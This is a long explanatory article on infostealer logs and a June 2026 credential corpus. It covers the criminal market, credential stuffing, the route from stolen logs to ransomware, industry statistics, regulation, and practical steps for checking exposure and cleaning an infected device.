The most fundamental limit is one of timing. DBSC is prospective. It does nothing about credentials and cookies already in circulation, including everything in the June 2026 corpus and the vast stream of stealer output behind it. The infostealer market does not operate on a forward-looking basis; the logs already traded, already loaded, already being used for account takeover, are unaffected by a protection that changes how future sessions behave. For the data already out there, the only remedies remain the unglamorous ones: change exposed passwords, invalidate active sessions where you can, and remove the malware.

DBSC is best understood as part of a broader move to make stored secrets less replayable, alongside passkeys and short-lived tokens, rather than as a fix for the current dataset. It raises the cost of cookie theft and, over time and with broad adoption, could blunt one of the most effective MFA-bypass techniques in use. But it is a defence for the next infection, not a cleanup for the last one, and the contents of the June 2026 logs sit firmly on the wrong side of that line.

The economics of a single stolen login

A stolen credential is worth something only because there is a market that prices it, and the structure of that market explains why the June 2026 corpus exists at all. Once a stealer log lands with its operator, it enters a trade with surprisingly low unit prices and surprisingly high turnover. Individual logs change hands cheaply, often around the cost of a coffee on the busier marketplaces, because supply is enormous and a single log’s value depends entirely on what it contains. A log with a live banking session or a corporate VPN credential is worth far more than one with only a streaming-service password, and the market sorts accordingly.

The trade runs through a few well-worn venues. Telegram is the dominant channel, hosting both public channels that advertise and dump logs and private paid groups where clients get searchable access to fresh material. Dedicated marketplaces operate alongside it, letting buyers search by country, by site, or by the presence of specific high-value credentials, and pricing logs as discrete products. The now-defunct Genesis Market pioneered selling not just credentials but the browser fingerprints and cookies to impersonate the victim’s session convincingly; its takedown removed one venue, and others absorbed the demand. The pattern, again, is that disrupting a single marketplace dents the trade without ending it.

The buyers are not a monolith, and the most important category for the downstream damage is the initial access broker. These are specialists who acquire credentials in bulk, validate which ones still work, and resell verified access to other criminals, most consequentially to ransomware crews. A broker turns a raw stealer log into a tested product: not “here are some passwords that might work,” but “here is confirmed access to this organisation’s environment.” That validation step is what links the cheap, high-volume world of stealer logs to the expensive, targeted world of corporate extortion. A login that cost a few dollars as part of a log can become the entry point for a seven-figure ransomware incident.

This is why the volume in datasets like the June 2026 corpus translates into real harm rather than abstract risk. The logs are raw material. The brokers refine them. The end users monetise them through fraud, account takeover, extortion or resale. Each step adds value and extends the life of the original theft, which is why a credential stolen months ago can still be doing damage today. The commodity does not perish quickly, and as long as the underlying password works somewhere, the log retains value through every hand it passes.

The aggregation dynamic compounds the economics. Because logs are copied, merged and recirculated, the same credential can appear in many products, sold many times to many buyers. A single password reuse by a single victim can therefore generate income for multiple criminals across multiple transactions, none of whom did the original stealing. The threat-intelligence researchers who eventually hand a cleaned corpus to HIBP are scraping the public and semi-public end of this churn, which is why the data they collect is so heavily duplicated and why deduplication is the essential first step before any honest count.

There is a grimly efficient logic to all of this from the attacker’s side, and naming it helps clarify the defence. Infostealers offer the best return on investment in the cybercrime market, because the input cost is low, the malware is bought rather than built, the harvest is automated, and the output is a reusable, resellable asset with a long shelf life. Compared with the effort of ransomware negotiation or the slim margins of cryptojacking, harvesting and selling credentials is close to passive income. That economic gravity is what keeps pulling new suppliers, new traffers and new buyers into the market, and it is why supply-side enforcement alone cannot win.

The defensive implication follows directly from the economics. The value of a stolen credential collapses if it does not work anywhere it is tried. A unique password that has been changed is worthless to a buyer. A session bound to a device cannot be replayed. A passkey cannot be harvested as a reusable secret at all. The market is efficient at extracting value from replayable secrets, so the durable defence is to stop providing replayable secrets, which removes the product the market is built to sell. Everything in the practical sections that follows is, at bottom, an effort to make the harvested credential worth nothing.

Credential reuse turns one password into many break-ins

The single behaviour that converts a stealer log from a contained problem into a sprawling one is password reuse, and the data on how common it is should end any debate about whether it matters. When Verizon’s analysts examined the credentials saved on devices infected by infostealers, they found that in the median case only about half of a given user’s passwords were distinct from one another. The rest were reused across services. For the typical victim, one stolen password is not one compromised account; it is a master key that opens a meaningful fraction of their digital life.

This is the mechanism behind credential stuffing, the automated attack that the June 2026 corpus directly enables. The technique is simple and brutally effective. An attacker takes a stolen email-and-password pair and tries it, automatically, across a wide list of services: email providers, banks, retailers, social platforms, workplace tools. Because so many people reuse passwords, a stolen credential that worked at one site has a good chance of working at others. The attacker is not guessing or cracking anything; they are betting on reuse, and the bet pays off often enough to be worth running at industrial scale. With a corpus of tens of millions of credentials, the hit rate does not need to be high for the absolute number of compromised accounts to be large.

Credential stuffing is also designed to be hard to detect, which is part of why it remains so successful. Each stolen credential is typically tried only once against a given account, so the attempts blend into normal login traffic and rarely trigger the rate-limiting or lockout protections built to catch repeated failed logins from one source. Verizon’s examination of single sign-on provider logs found that credential stuffing accounted for roughly a fifth of all authentication attempts on a median daily basis, a startling figure that means a substantial share of the login traffic hitting major identity providers is criminals quietly testing stolen pairs.

The stealer-log format makes this attack more efficient than older combo lists ever could, and this is worth dwelling on. A combo list gives an attacker email-and-password pairs with no context. A stealer log gives them the pair plus the exact site where it was used. That turns a blind spraying attack into a targeted one: the attacker can go straight to the service where the credential is known to work, and then test the same password at the high-value services where reuse would be most damaging. The pre-indexing by site, again, is what makes stealer logs the premium product in the credential-theft market.

The chain of harm from reuse has produced some of the most consequential breaches of recent years. Major incidents at companies including ride-hailing and consumer-genetics firms were enabled not by sophisticated intrusions but by reused or stolen credentials feeding credential-stuffing and account-takeover attacks. The pattern in the Snowflake-related intrusions of 2024 was similar: a large share of the compromised accounts had prior credential exposure, plausibly collected by infostealers, and the attackers simply used credentials that worked because a second factor was not enforced. The common thread is not clever hacking. It is a reused password meeting a service that trusted the password alone.

The fix is conceptually trivial and behaviourally hard, which is the whole problem. A unique password for every service means a single stolen credential compromises exactly one account, and credential stuffing collapses because there is nothing to reuse. The reason this advice has been repeated for two decades without being followed is that unique passwords are impossible to remember at the scale of modern digital life. That is precisely the gap a password manager fills, and it is why the later practical guidance treats unique passwords and a manager as a single, inseparable recommendation rather than two separate tips. Reuse is the lever that multiplies the damage; removing reuse removes the multiplier.

The ransomware pipeline that begins with one log

The connection most people miss is the one between a stolen browser password and a crippled hospital or factory. Stealer logs are not only a fraud problem; they are the front end of the ransomware supply chain, and the data tying the two together is now hard to dismiss. When researchers correlated infostealer logs and marketplace postings against the organisations that ransomware groups publicly named as victims, they found that more than half of those ransomware victims had appeared in the credential dumps beforehand, with their domains showing up as sites the stolen credentials were used against. The same pattern held across both 2024 and 2025: a majority of ransomware victims were sitting in stealer-log marketplaces before the attack landed.

The pipeline runs in stages, each handled by a different specialist. A traffer spreads the malware. The stealer harvests an employee’s device, including any corporate credentials saved in the browser. An initial access broker buys the log, validates that the corporate credentials still work, and sells confirmed access to a ransomware affiliate. The affiliate uses that access to get inside the network, move laterally, escalate privileges, and eventually deploy the ransomware. A single infected laptop, belonging to one employee who saved a work login in a personal browser, can be the first link in a chain that ends with an entire organisation encrypted.

The speed of this chain has compressed in a way that should worry defenders. Verizon’s analysis of the gap between a credential appearing in a stealer log and a ransomware incident found the timing alarmingly short, with a common interval measured in a small number of days. If a credential surfaces in a marketplace at the start of the week, the organisation it unlocks can be facing ransomware before the week is out. The window between exposure and exploitation is too short to rely on slow, manual detection, which is why monitoring for exposed credentials in near real time has become a serious part of enterprise defence rather than a nice-to-have.

The macro numbers frame the stakes. Ransomware appeared in 44% of breaches in the most recent Verizon dataset, up sharply from the prior year, even as the median ransom payment fell and a growing majority of victims refused to pay. The decline in payments is encouraging and reflects better preparedness and negotiation, but the rising prevalence shows the volume of attacks is not slowing. As long as stolen credentials keep flowing out of infected endpoints, ransomware crews have a cheap, reliable way in, and the stealer-log market is the wholesaler keeping them supplied.

What makes this especially difficult is the boundary problem described earlier. The credentials that lead to ransomware are frequently harvested from devices the organisation does not manage. Verizon’s infostealer analysis found that while a notable share of compromised systems carrying corporate logins were enterprise-licensed, a larger share of the systems holding corporate credentials were unmanaged, most likely personal or bring-your-own devices being used for work, hosting personal and business credentials side by side. The corporate credential was stolen from a machine the company never controlled, which means traditional endpoint defences on managed assets did nothing to prevent it.

For organisations, the implication is that ransomware defence and infostealer defence are the same project. Hardening the perimeter and backing up data matter, but if a valid corporate credential is for sale in a marketplace, the attacker does not need to break the perimeter; they log in. Defending against ransomware therefore starts upstream, at the credential: enforcing phishing-resistant authentication so a stolen password is not enough, monitoring for the organisation’s domains appearing in stealer logs, and being able to force credential and session resets quickly when they do. The June 2026 corpus is not only a list of individuals at risk of fraud. Buried in those 56 million addresses are the corporate logins that some ransomware affiliate may already be validating.

Verizon’s evidence on who is really getting infected

The annual Verizon Data Breach Investigations Report has become the most-cited source on how breaches actually happen, and its 2025 edition is unusually direct about the role of infostealers. Built on more than 22,000 security incidents and over 12,000 confirmed breaches across 139 countries, it is the largest dataset in the report’s eighteen-year history, which gives its findings weight beyond any single vendor’s marketing. Its conclusions on credentials cut straight to the heart of what the June 2026 corpus represents.

The headline finding is that stolen credentials remained the most common way attackers gained initial access, used in 22% of breaches, holding the top spot for a second consecutive year. Phishing accounted for 16% and vulnerability exploitation for 20%, the last of these growing fast, but credential abuse stayed on top. The dominance is even starker in specific patterns: 88% of basic web-application attacks involved stolen credentials. The human element, encompassing errors, social engineering and misuse, featured in 60% of breaches. The picture the report paints is of attackers consistently choosing the path of least resistance, and that path is a working credential.

The infostealer-specific analysis is where the report speaks most directly to stealer logs. Examining the credential logs produced by this malware, Verizon’s team found that 30% of the compromised systems could be identified as enterprise-licensed devices, meaning corporate-managed machines were well represented in the harvest. More striking, of the compromised systems that held corporate login data, 46% were non-managed devices, most plausibly personal or bring-your-own machines hosting both personal and business credentials. The report’s dry conclusion was that an organisation which does not consciously choose and enforce a policy on which devices can reach corporate systems may find the policy chosen for it, with results it will not like.

The reuse data from the same report, already noted, anchors why this is so dangerous: in the median case, only around half of an infected user’s passwords were distinct from one another. Combined with the finding that credential stuffing made up roughly a fifth of authentication attempts to single sign-on providers on a typical day, the report describes an environment in which stolen, reused credentials are not an edge case but a constant background hum of the internet’s login traffic. The attacks are quiet, continuous and largely automated, which is exactly why they evade the defences tuned for noisier intrusions.

There is a sobering footnote about the limits of existing protections. The report and adjacent research found that a large majority of malware infections occurred on devices that had antivirus or endpoint security installed, and that conventional multi-factor authentication is increasingly being bypassed through prompt bombing, token theft and the session-cookie technique described earlier. Having security tools and having MFA are necessary but no longer sufficient, because the malware evades the tools and the cookie theft sidesteps the second factor. The report’s recommended mindset shifted accordingly, from “assume you will be breached” to a more constructive “assume access, ready defences,” meaning assume some credentials are already compromised and build login-time controls that contain the damage.

For a reader trying to place the June 2026 dataset in context, the Verizon evidence does two things. It confirms that the corpus is not an anomaly but a sample of the single most important attack vector on the internet, and it dismantles the comforting belief that corporate and personal exposure are separate. The blurring of work and personal credentials on unmanaged devices is not a fringe risk; by Verizon’s count it is where a large share of corporate credential theft now originates. The infected personal laptop is the soft underbelly of enterprise security, and the stealer logs are the proof.

Stealer logs behave like a firehose, not a discrete breach

One of the more useful observations Troy Hunt has made while loading these datasets is that the very concept of a “breach” fits stealer logs badly. A classic breach is a discrete event with a clear before and after. A specific company was secure on Monday and compromised on Tuesday; a defined database was copied; the affected population is the set of people who had accounts there. Ashley Madison, Dropbox and the hundreds of other named entries in HIBP work this way. Stealer logs do not. They are not an event; they are a continuous flow, a firehose of credentials being harvested from new victims every day, then merged, repackaged and recirculated without end.

This changes how any single dataset should be understood. The June 2026 corpus is not “the moment 56 million people were compromised.” It is a snapshot, a scoop taken from an ongoing stream, deduplicated and frozen at the point of loading. The same victims may appear in earlier and later scoops. The same credentials flow through countless channels simultaneously. Treating a stealer-log load as a single incident with a single date imposes a structure on the data that does not match how the data is actually produced, which is one reason the loads can feel both alarming and strangely indeterminate: there is no clean victim organisation, no precise breach date, and no defined population.

Hunt has described the practical consequence in his own work. When his team checks a new corpus against the existing HIBP data, the crossover is routinely very high, frequently in the high eighties or low nineties as a percentage, and most of the previously-seen material traces back to earlier stealer-log loads rather than to conventional breaches. For the Synthient stealer corpus, a sample of around 94,000 addresses showed roughly 92% had been seen before, mostly in a prior large stealer load. That high recirculation is the signature of a firehose. The water keeps coming, but a lot of it is the same water that has already passed through.

This has direct implications for notification and for how people should react. HIBP has, sensibly, stopped sending fresh alerts for every backfilled or recirculated batch, on the reasoning that there is a threshold beyond which more notifications become noise rather than signal. An email saying “that stealer-log exposure you already knew about now contains slightly more data” helps almost no one. The meaningful signal is the first time an address shows up in stealer logs at all, because that is the evidence of a device infection; subsequent appearances of the same address in later scoops mostly confirm what is already known.

The firehose framing also clarifies why the deduplicated unique counts matter so much more than raw rows. A corpus described as “hundreds of millions of records” or “23 billion rows” sounds apocalyptic, but those are line counts inflated by the merging and re-merging that define the ecosystem. The honest figures are the deduplicated uniques: 56 million addresses, 124 million passwords for the June 2026 set. The raw row count measures how much the data has been copied; the unique count measures how many distinct people and secrets are actually involved. Coverage that leads with row counts is measuring duplication and calling it scale.

For the individual, the right takeaway from the firehose model is neither panic nor dismissal. It is a recognition that exposure in stealer logs is a state, not an event. If you have been infected once, your credentials are somewhere in the stream, and they will keep resurfacing in new aggregations regardless of any single dataset. That shifts the goal from reacting to each load toward a durable posture: assume your saved credentials may be out there, make them worthless through uniqueness and rotation, harden the device against the next infection, and stop relying on the model of waiting for a breach notification to tell you when to act. The firehose does not stop, so the defence has to be standing rather than reactive.

Recycled mega-breaches and how to read an alarming headline

Every few months, a headline announces that some staggering number of passwords, sixteen billion, twenty-six billion, has leaked, and a wave of secondary coverage treats it as a catastrophe. Almost every time, the reality is more mundane and the framing is wrong. Learning to read these stories correctly is a genuine skill, and the stealer-log ecosystem is the main reason they keep appearing. The June 2026 dataset arrived in exactly this kind of noisy environment, and separating it from the surrounding hype is part of understanding it.

The recurring error is conflating an aggregation with a breach. A breach is a fresh compromise of a specific system. An aggregation is a pile of previously stolen data, scraped together from many old sources and republished as one giant file. The mega-breach headlines almost always describe aggregations. The “16 billion passwords” story of mid-2025 was a compilation of publicly accessible stealer logs, mostly repurposed from older leaks, with only a small portion of genuinely new material; the corpus HIBP eventually loaded from it under the name Data Troll resolved to a much smaller set of unique addresses once the duplication was stripped out. The pattern is consistent: a huge row count, a tiny fraction of novelty, and coverage that reports the row count as if it were a body count.

History rhymes here. The “Collection #1” dump of 2019 was widely called a mega-breach, but careful analysis showed it was a large aggregation built for credential stuffing, with around 2.6 billion rows collapsing to roughly 773 million unique addresses and about 1.16 billion unique pairs once deduplicated. The 2024 compilation dubbed the “mother of all breaches” was reported as 26 billion records but was again a multi-source aggregation, not a single event. In each case, the heterogeneous sources spanned years, the uniqueness was far below the headline, and the recency was overstated. The number that travels is the scariest one, not the most accurate one.

The “Gmail breach” episode of October 2025 shows how this misreading harms real people. Coverage claimed millions of Gmail accounts had been breached, when the underlying reality was that infostealer logs naturally contain Gmail credentials, because Gmail is among the most used services on the planet. Google stated plainly that the alarm stemmed from a misreading of credential-theft database updates rather than any attack on Gmail, and urged users toward two-step verification and passkeys. The credentials were real, but they were harvested from infected users’ devices, not stolen from Google, and framing it as a Gmail breach pointed people at the wrong culprit and the wrong fix.

There is a measurable taxonomy that cuts through all of this, and it is worth internalising. The questions to ask of any scary credential headline are: is this a breach of a specific system, or an aggregation of old data; are these unique counts or raw rows; and how much of it is genuinely new versus recirculated. The November 2025 Synthient datasets are a clean illustration of why the distinctions matter, because HIBP deliberately split them: a stealer-log corpus of 183 million unique addresses, and a separate credential-stuffing aggregation of nearly two billion. Reporting that merged the two into one “two-billion mega-breach” got the meaning wrong, because the two have different origins, different evidence value and different implications.

None of this licenses complacency, and that balance is the point. The hype is wrong, and the underlying threat is real. The correct response to an inflated headline is not to dismiss the whole topic but to translate the number into the question that actually matters for you: has my address appeared in stealer logs, do I reuse passwords, and is my device clean. The June 2026 corpus deserves attention precisely on those terms, as a checkable, verified dataset that may contain your credentials, rather than on the terms of whatever larger, vaguer number happens to be trending the same week. Reading these stories well means caring about the right thing and ignoring the inflation wrapped around it.

The personal fallout when your own machine is the leak

For an individual, finding your address in a stealer-log corpus carries a different emotional and practical weight than learning a website you used was breached, and the difference is worth naming. A website breach is something that happened to a company you trusted. A stealer-log appearance is evidence that something ran on your device and copied your secrets. It is closer and more personal, and it implicates the machine you are reading this on rather than a distant server you have no control over. That shift in locus is the reason the right response also has to be more thorough.

The immediate exposure is broad because the harvest was broad. Where a single-service breach exposes your credential for that one service, a stealer log exposes whatever you had saved at the moment of infection across every site, in plaintext, with the URLs attached. The realistic assumption is that every password stored in that browser at that time is compromised, along with any session cookies, autofill data and saved payment details. That is a much wider blast radius than most breach notifications imply, and it is why advice to “change the password on the affected site” badly understates what is needed.

The downstream harms follow from that breadth. The most common is account takeover via credential stuffing, where the stolen pair is tried across email, banking, shopping and social accounts until something works. Email is the highest-stakes target, because control of an inbox enables password resets on nearly everything else; an attacker who gets into your email can often pivot to every account tied to it. Financial fraud, fraudulent purchases, and the hijacking of social or messaging accounts to scam your contacts all flow from the same root. Where session cookies were taken, the attacker may not even need to log in; they can ride your existing sessions until they expire.

There is a phishing aftershock that catches people off guard. Once a dataset surfaces and is publicised, scammers craft messages that reference the breach itself, posing as the affected service or as a security team and using the victim’s real exposed details to seem credible. A breach notification you genuinely received can be followed by a fake one engineered to exploit your alarm, steering you to a counterfeit login page to “secure your account” and harvesting the new credential. The right reflex is to act through known channels, by typing the service’s address yourself, rather than clicking links in any message that arrives in the wake of a breach.

The psychological dimension is real and worth treating honestly rather than dismissing. Discovering that your own device was the source of a leak can produce a sense of violation and a creeping uncertainty about where else your data has flowed and how it is being used. That unease is understandable, but it is most useful when it is channelled into concrete action rather than left as free-floating anxiety. The exposure is a known quantity with a known response, and working through that response, methodically, is both the practical fix and the antidote to the helpless feeling the news can produce.

There is also a quieter, longer-tail harm in the recirculation already described. Because stealer data is merged and redumped indefinitely, a single past infection can keep generating exposure for years, surfacing your old credentials in new aggregations long after you thought the matter was closed. This is why the durable response is to make the stolen credentials permanently worthless rather than to treat each new dataset as a separate fire to put out. A password that was unique and has been changed, on an account now protected by a phishing-resistant second factor, is inert no matter how many times it resurfaces. The fallout from being in a stealer log is real, but it is bounded by the actions you take, and the next sections lay out exactly what those actions are.

Sector by sector, the exposure looks different

A stealer log does not respect industry boundaries, but the consequences of the credentials it contains vary enormously depending on which sector each account belongs to. Looking at the exposure sector by sector clarifies why a single corpus like the June 2026 set can produce wildly different kinds of damage for different victims, and why the defensive priorities differ accordingly.

Financial services sit at the sharp end. A banking or brokerage credential in a stealer log is a direct route to money, and where the log also carries a live session cookie, an attacker may slip past a second factor entirely. The sector has responded faster than most, layering behavioural analytics, device fingerprinting and step-up authentication onto logins, and moving toward phishing-resistant methods, partly under regulatory pressure such as Europe’s strong-customer-authentication requirements. Even so, credential stuffing and account takeover remain persistent threats, and the immediate harm potential is among the highest of any sector. For a victim, a financial credential is the one to rotate first and to protect with the strongest available second factor.

Healthcare carries a different but severe profile. Health systems hold deeply sensitive records and run sprawling, often under-resourced IT estates, which makes them frequent ransomware targets, and stealer-harvested credentials are a common entry point. A clinician’s saved login, taken from a personal device used for work, can open a path into a hospital network where the consequences extend beyond data theft to disrupted care. The combination of high-value data, life-safety stakes and uneven security maturity makes healthcare one of the sectors where an infostealer infection on a single staff device can cascade into a genuine operational crisis.

Retail and e-commerce face high-volume, lower-individual-value exposure that adds up. Stolen shopping credentials enable fraudulent purchases, loyalty-point theft and the draining of stored value, and the sheer number of accounts makes the sector a favourite for credential stuffing. The friction problem is acute here: retailers want frictionless checkout, but frictionless logins are exactly what stolen credentials exploit. The tension between conversion and security is more visible in retail than almost anywhere, and it is why the sector has been an early mover on passkeys, which promise both lower friction and stronger protection at once.

Software-as-a-service and cloud platforms are where credential theft has its widest blast radius for organisations. A single stolen credential for an identity provider or a productivity suite can unlock a whole organisation’s data and serve as a launch point for lateral movement. The Snowflake-related intrusions of 2024 showed how stolen credentials, used against accounts without enforced MFA, could compromise multiple large customers through one cloud provider. In SaaS, the credential is rarely the final target; it is the doorway to everything behind it, which is why the sector’s defensive emphasis has shifted toward phishing-resistant authentication, conditional access based on device posture, and the ability to revoke sessions fast.

The public sector and education combine large user populations, constrained budgets and high-value data, a mix that makes them recurring victims. Government credentials in stealer logs are serious enough that HIBP runs a free service letting national response teams monitor their official domains, with dozens of governments onboarded. Educational institutions, with transient users and decentralised IT, are frequent targets of extortion campaigns, and student or staff credentials harvested from personal devices feed those attacks.

The cross-sector lesson is that the same stolen credential means different things depending on where it works, but the upstream cause is identical: a credential saved on an infected device, often a personal one used for work. That shared root is why the defences converge even as the stakes differ. Unique credentials, phishing-resistant authentication, monitoring for exposed credentials, and the ability to revoke access quickly matter in every sector. What changes is the urgency and the order of priority, set by how much damage a working credential can do once it is in the wrong hands.

Developers, executives and the accounts worth the most

Not every credential in a stealer log is equal, and the market knows it. Some victims carry, on their infected devices, the kind of access that turns a routine harvest into a high-value prize. Developers and senior staff sit at the top of that list, and the contents of a modern stealer log are tailored to extract exactly what makes them valuable.

Developers are a category attackers actively prize, because of what tends to live on a developer’s machine. Beyond ordinary passwords, a stealer log from a developer’s device can carry SSH keys, cloud-provider tokens, API keys, and credentials for code repositories and deployment systems. Those artefacts are far more dangerous than a consumer password, because they often grant programmatic access to production infrastructure, customer data or software supply chains. The breadth of what stealers now grab, including VPN configurations, SSH keys and cloud tokens in a typical log, means a single developer infection can hand an attacker the keys to systems that thousands or millions of people depend on.

The hardcoded-secret problem compounds this. Separate research on secrets sprawl found tens of millions of new hardcoded credentials added to public code commits in a single year, a sharp rise driven partly by AI-assisted development, with leaked secrets tied to AI services growing fast and internal repositories far more likely than public ones to contain embedded secrets. A developer’s device is a concentration point for these high-privilege credentials, and when a stealer harvests it, the exposure reaches well beyond the individual into the systems they build and maintain. Cloud credentials, in particular, can be abused within seconds of being harvested, faster than monitoring systems sometimes deliver their first alert.

Executives and senior staff are valuable for different reasons. Their credentials open access to sensitive strategic information, financial systems and the authority to approve actions, which makes them prime targets for business email compromise and for the lateral movement that precedes ransomware. An executive who saves work credentials in a personal browser, then gets infected through an ordinary lure, can hand an attacker a foothold with unusual reach. Seniority correlates with access, and access is what the attacker is buying, which is why some premium stealers, including the macOS-focused families, are explicitly positioned at the higher-value users that Apple devices tend to attract.

The macOS angle is worth re-emphasising in this context, because it intersects directly with the high-value population. Developers and executives skew toward Macs, and the assumption that macOS is immune to this category is both common and wrong. Active macOS stealer families harvest credentials, keychain contents and session data much as their Windows counterparts do, and at least one was priced as a premium product precisely because of the value of the Apple-using demographic. The platform offers no exemption from credential theft, and the belief that it does leaves some of the highest-value targets among the least defended.

There is a structural point underneath all of this about non-human and machine identities, which are growing faster than human ones. Modern systems run on a sprawling set of service accounts, tokens and keys that authenticate software to software, and these are frequently the credentials a developer’s machine holds. They often lack the protections applied to human logins, such as MFA, and they can persist unrotated for long periods. A stolen machine credential can be both more powerful and longer-lived than a stolen human password, and stealer logs are increasingly a source of them. The defensive response is the same logic applied to a different identity type: rotate aggressively, scope access tightly, prefer short-lived credentials over long-lived secrets, and never embed secrets where a process running on a developer’s device can read them.

For the high-value individual, the practical implication is that the stakes of a single infection are higher and the remediation is more involved. It is not enough to change a few passwords. Keys must be rotated, tokens revoked, repositories audited, and cloud access reviewed, because the artefacts a stealer takes from a developer or executive can keep working long after the obvious passwords are changed. The June 2026 corpus, like every stealer load, contains a tail of these high-privilege credentials mixed in with the ordinary ones, and that tail is where the most serious organisational damage tends to originate.

Regulatory weight in Europe and the shift in password standards

Stealer logs sit awkwardly within a regulatory framework built mostly around breaches of organisations, and that mismatch shapes how the law applies to the June 2026 corpus. Under Europe’s General Data Protection Regulation, the obligations to secure personal data and to notify regulators and affected people fall on the organisation that controls the data. When a company is breached, the lines of responsibility are clear. When credentials are stolen from individuals’ own infected devices, there is no breached controller to hold accountable for that specific theft, which leaves a genuine gap between how the harm occurs and how the rules are written.

That gap does not leave organisations off the hook downstream, though, and this is where the regulatory weight reattaches. If a company suffers a breach because an attacker logged in with credentials harvested by an infostealer, the company can still bear responsibility for the resulting compromise of its systems and the personal data within them. Regulators have made clear that weak authentication and a failure to defend against credential-based attacks can constitute inadequate security. An organisation cannot prevent its users from being infected, but it can be expected to assume some are, and to build access controls that contain the damage, which is precisely the posture the threat data recommends. A breach enabled by a stolen-but-foreseeable credential, against a service that relied on the password alone, is a harder position to defend before a regulator than one protected by phishing-resistant authentication.

The directional pressure in Europe is toward stronger authentication, not merely better breach response. The payment-services framework’s strong-customer-authentication requirements already push financial services toward multi-factor and phishing-resistant methods, and the successor framework agreed in 2025 extends that trajectory into implementation over the following years. Network-and-information-security rules raise the baseline expectations for a widening set of organisations. The regulatory current runs steadily toward eliminating reliance on shared secrets, which aligns with the technical direction the rest of this analysis describes.

The standards picture reinforces this and is arguably more consequential than any single regulation, because standards shape what “reasonable security” means in practice. In 2025, the United States National Institute of Standards and Technology finalised the latest version of its digital-identity guidance, and the changes mattered. Multi-factor authentication at the standard assurance level must now offer a phishing-resistant option, stated as a requirement rather than a suggestion, with the highest assurance level demanding authenticators whose private keys cannot be exported. Synced passkeys were recognised as qualifying at the standard assurance level. The same body’s long-standing advice to screen new passwords against lists of known-compromised values, the advice Pwned Passwords operationalises, remains in force.

The deprecation of weak factors is part of the same shift, and it is moving fast. Through 2025, momentum built against SMS-based one-time codes, which are vulnerable to interception and social engineering, with security agencies warning against their use for authentication and various institutions discontinuing them. The clear regulatory and standards message is to move away from passwords-plus-SMS toward phishing-resistant methods, and that message is now backed by deadlines and requirements rather than aspiration.

For organisations reading the June 2026 dataset as a risk signal, the regulatory and standards environment converts good practice into something closer to obligation. Screening passwords against compromised lists, enforcing phishing-resistant authentication, and being able to respond quickly when credentials are exposed are increasingly the expected baseline against which security is judged. The credentials in stealer logs are foreseeable, and foreseeable risks are the ones regulators expect organisations to have planned for. The dataset is not just a security prompt; it is a reminder that the legal and standards-based definition of adequate authentication is tightening, and that reliance on passwords alone is steadily becoming indefensible.

Checking your own exposure the right way

Acting on a dataset like the June 2026 corpus starts with finding out whether it concerns you, and there is a right way to do that which avoids the traps scammers set around these events. The primary tool is Have I Been Pwned itself. Going to the site directly and entering your email address tells you whether it appears in the breaches and corpora HIBP has loaded, including the stealer-log datasets. Type the address into the site yourself rather than clicking a link in any email claiming to check it for you, because messages promising to test your exposure are a known phishing pattern, especially in the days after a breach is publicised.

The address check is the first step, but for stealer logs the more useful information is which sites your credentials were captured against. HIBP’s stealer-log features let a verified user, through the notification service, see the specific domains their address appeared next to in the logs, which turns a vague alert into an actionable list of accounts to secure. If you can see that your address showed up against particular services, those are the credentials to rotate first, because the attacker knows exactly where they work. Signing up for HIBP’s free notifications also means you are told automatically if your address surfaces in future loads, which matters given the firehose nature of the data.

The password side is checked differently and deserves its own pass. Pwned Passwords lets you check whether a specific password has appeared in known compromises, using the k-anonymity method that never sends your full password or its complete hash to the server. Most reputable password managers now run this check across an entire vault automatically, flagging every stored password that appears in the corpus, which is far more practical than checking passwords one by one. A password that appears in Pwned Passwords should be treated as compromised regardless of how strong it looks, and replaced, because its presence means it is in the lists attackers feed into automated attacks.

A note on what a clean result does and does not mean is essential to using these tools honestly. A negative result on HIBP means your address has not appeared in the data the service has loaded and verified; it does not mean your credentials are safe, because plenty of stolen data never reaches HIBP or sits in private channels. Absence from the database is reassuring but not conclusive. The sensible reading of a clean result is “no known exposure in HIBP’s data,” not “I am secure,” and the preventive habits described later apply regardless of what the check returns.

There are complementary checks worth knowing about. Some security vendors offer broader exposure-monitoring services that scan additional sources, and several browsers and operating systems now include built-in breach alerts that notify you when a saved credential appears in a known compromise. Using more than one source gives a fuller picture, though the same caveat applies to all of them: no single service sees everything, and a quiet result from any one of them is not a guarantee. The goal is a reasonable view of your exposure, not a false sense of certainty.

If a check comes back positive, the order of operations matters, and panic is the enemy of a good response. Start with the highest-stakes accounts and work down: email first, because it controls resets on everything else, then financial accounts, then any work-related logins, then the rest. For each, change to a unique password, enable the strongest available second factor, and where the option exists, sign out of all active sessions to kill any stolen cookies. The next section addresses the part most people skip, which is the device itself, because if the machine is still infected, every new password you set is captured the moment you type it, and the cleanup has to begin there.

Cleaning an infected machine and the limits of a password reset

The instinct after a breach notification is to change passwords, and that instinct is right but incomplete. For a stealer-log exposure specifically, changing passwords without addressing the device can be worse than useless, because if the malware is still running, it simply captures the new credentials as you enter them. The first question after a stealer-log appearance is not “which passwords do I change” but “is the machine that was infected now clean,” and answering it properly reorders the entire response.

In practice, the difficulty is that you often do not know which device was infected or when. Stealer infections leave little trace, run quickly and frequently self-delete, and the exposed data may date from an infection months or years ago on a machine you may no longer use. Where you can identify or reasonably suspect a device, the conservative approach is to run a reputable malware scan, but to understand its limits, since a large share of infections happen on machines that already had security software, and a stealer that has already exfiltrated and removed itself may leave nothing for a scanner to find. For a device you genuinely suspect, the most reliable cleanup is a full reset of the operating system from known-good media, which removes persistence the malware may have established and gives you a clean base to re-establish credentials from.

The table below sets out what each common defensive action actually accomplishes against a stealer-log exposure, because the gaps between measures are where people get a false sense of safety.

What each defensive measure stops after a stealer-log exposure

MeasureWhat it stopsWhat it does not stop
Changing one reused passwordReuse-based stuffing for that one passwordOther reused passwords; active stolen sessions; an active infection
Unique passwords plus a managerOne credential compromising many accountsTheft of whatever is captured during a fresh infection
App or SMS second factorLogin attempts using only a stolen passwordReplay of stolen live session cookies; SMS interception
Passkeys (FIDO2)Phishing and reuse of a harvestable shared secretRisks on accounts not yet moved to passkeys
Device-bound sessions (DBSC)Replay of a stolen cookie on another deviceTheft of passwords and other log contents; unsupported sites
Removing the malwareThe device continuing to leak new credentialsExposure of data already exfiltrated before cleanup

Read together, the rows show why no single action is sufficient and why sequence matters: clean the device, then rotate credentials, then revoke sessions, then strengthen authentication. Each measure closes one gap and leaves others open.

